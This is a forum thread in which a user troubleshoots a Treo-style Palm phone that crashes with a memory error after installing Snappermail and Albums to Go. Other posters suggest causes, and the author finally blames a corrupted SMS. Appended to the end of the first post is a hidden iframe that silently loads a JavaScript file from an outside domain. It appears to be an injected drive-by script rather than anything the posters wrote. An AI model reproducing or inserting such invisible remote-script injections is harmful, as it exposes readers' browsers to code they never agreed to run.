+ Reply to Thread
Results 1 to 9 of 9
  1. #1
    Registered User bxjmpr's Avatar
    Join Date
    09-02-2002
    Location
    NY
    Posts
    87

    Exclamation Major crash - Virus?

    I don't know if anyone can help me. I think some how I got a virus. I found a file named "Delete me!" So stupidly I deleted it. Ever since then I can't get the phone to turn on for more than 1 minute without it saying "MemoryMgr.c, Line:4450, Invalid chunk ptr" I had just installed Snappermail and the key for Album to go. I was setting up the accounts for Snappermail when this occured. I've never heard of viruses attacking the phones but I don't know what it could be. I've searched all of the threads and can't find anything similar. I have performed a hard reset and it still does the same thing. I have tried to hot synch and it won't let me finish installing before it crashes again. I try to just give up and turn off the phone and it turns back on with the error message. Any help would be greatly appreciated!!!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    i dont think you have a virus..

    but i do believe albums to go my be the culprit...

    first off, when you do a cold reset and then simply resync back up to the old palm db on your computer, you mearly load the baad apps back into the phone...

    so do this...

    go to your c:\palm\[username]\backup and delete albums to go and the files associated with it (if there are any more)

    or you can simply rename your backup to a new name...



    im almost certain its ATG because once i bought the key for it when they released 2.0 it immediately crashed my 6035.. the same may be happening in your case....


    FYI.. i would suggest Fireviewer.. its tons better than ATG....

  3. #3
    Registered User
    Join Date
    07-08-2002
    Location
    CA
    Posts
    78
    hhhmmm.....strange. I too coincidentally deleted a file called "Delete Me" this morning when trying to reclaim space. However i have not had any problems nor did I ever install Albums to Go.

  4. #4
    Registered User bxjmpr's Avatar
    Join Date
    09-02-2002
    Location
    NY
    Posts
    87
    Thanks for your help but I still don't know what's going on. I had found a post about ATG so that is the first thing I deleted. If I shut off the phone I can restore everything but as soon as i turn on the phone about 30 seconds goes by and it says Fatal Alert again. I don't know what else it could be it's been running great until now. The only other thing I installed today is Spellman. I'll delete everything associated with that and try again.

  5. #5
    Registered User bxjmpr's Avatar
    Join Date
    09-02-2002
    Location
    NY
    Posts
    87
    I performed a hard reset and didn't re-install anything and the phone still doesn't work. I even loaded the palm software onto another computer and started fresh. Still no good. Any ideas?
    Last edited by bxjmpr; 10-07-2002 at 06:47 AM.

  6. #6
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    well your phone may be in need of repair.

    can you use the phone normally? i.e. plam functions (date book, to do...) and make calls?

  7. #7
    Registered User bxjmpr's Avatar
    Join Date
    09-02-2002
    Location
    NY
    Posts
    87
    Ok how weird is this - I went to the sprint store and they tried to give me a new phone. When the new phone was programed with my number the same thing happened to the new phone. We repeated the proceedure with yet another phone - same thing. My original phone without any number in it will come on without the error message. I wonder if I have to change my number? They referred me to tech support but I have to wait for them to get back to me. Let's see how long that will take.

    P.S. Yes with the phone off I can use the palm functions and as soon as I turn on the phone I have 30seconds to place a call but then it will freeze so to disconnect the call I have to reset.
    Last edited by bxjmpr; 10-07-2002 at 02:15 PM.

  8. #8
    Registered User
    Join Date
    05-31-2002
    Location
    san jose, CA
    Posts
    12
    that is funny!! Just humorous. Got nothing to do with the s/w, but to do with your number. Sorry! Couldn't stop laughing.

    I hope you don't loose your number. Do update us when you get it fixed finally.

  9. #9
    Registered User bxjmpr's Avatar
    Join Date
    09-02-2002
    Location
    NY
    Posts
    87
    It's been almost 2 weeks and still no help from Sprint. The tech guy I was dealing with went on vacation and gave me the name of his manager but she is not in the tech department so I didn't bother to contact her. My phone is almost fully operational now. I have come to the concusion that it was the snappermail that caused the problem. While trying to see how snapper mail works, I sent myself an email to my sprint account which is set up to send me a text message when I recieve email. There is a known problem with recieving sms messages while using snappermail. I think somehow it corrupted the text message and everytime I turned on my phone (or the new ones at the store) the network tried to send it and I recieved the error message. One day I turned on my phone and all of my back messages (except for the one that would've come through while on snappermail) came through and my phone has been working ever since. Now however I have no missed call log and everytime I try to access it the phone crashes and I need to do a soft reset. I don't care about it too much because I don't give out this number but it would be nice to have it working again. Are there any known apps that cause this? Thanks for the help!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts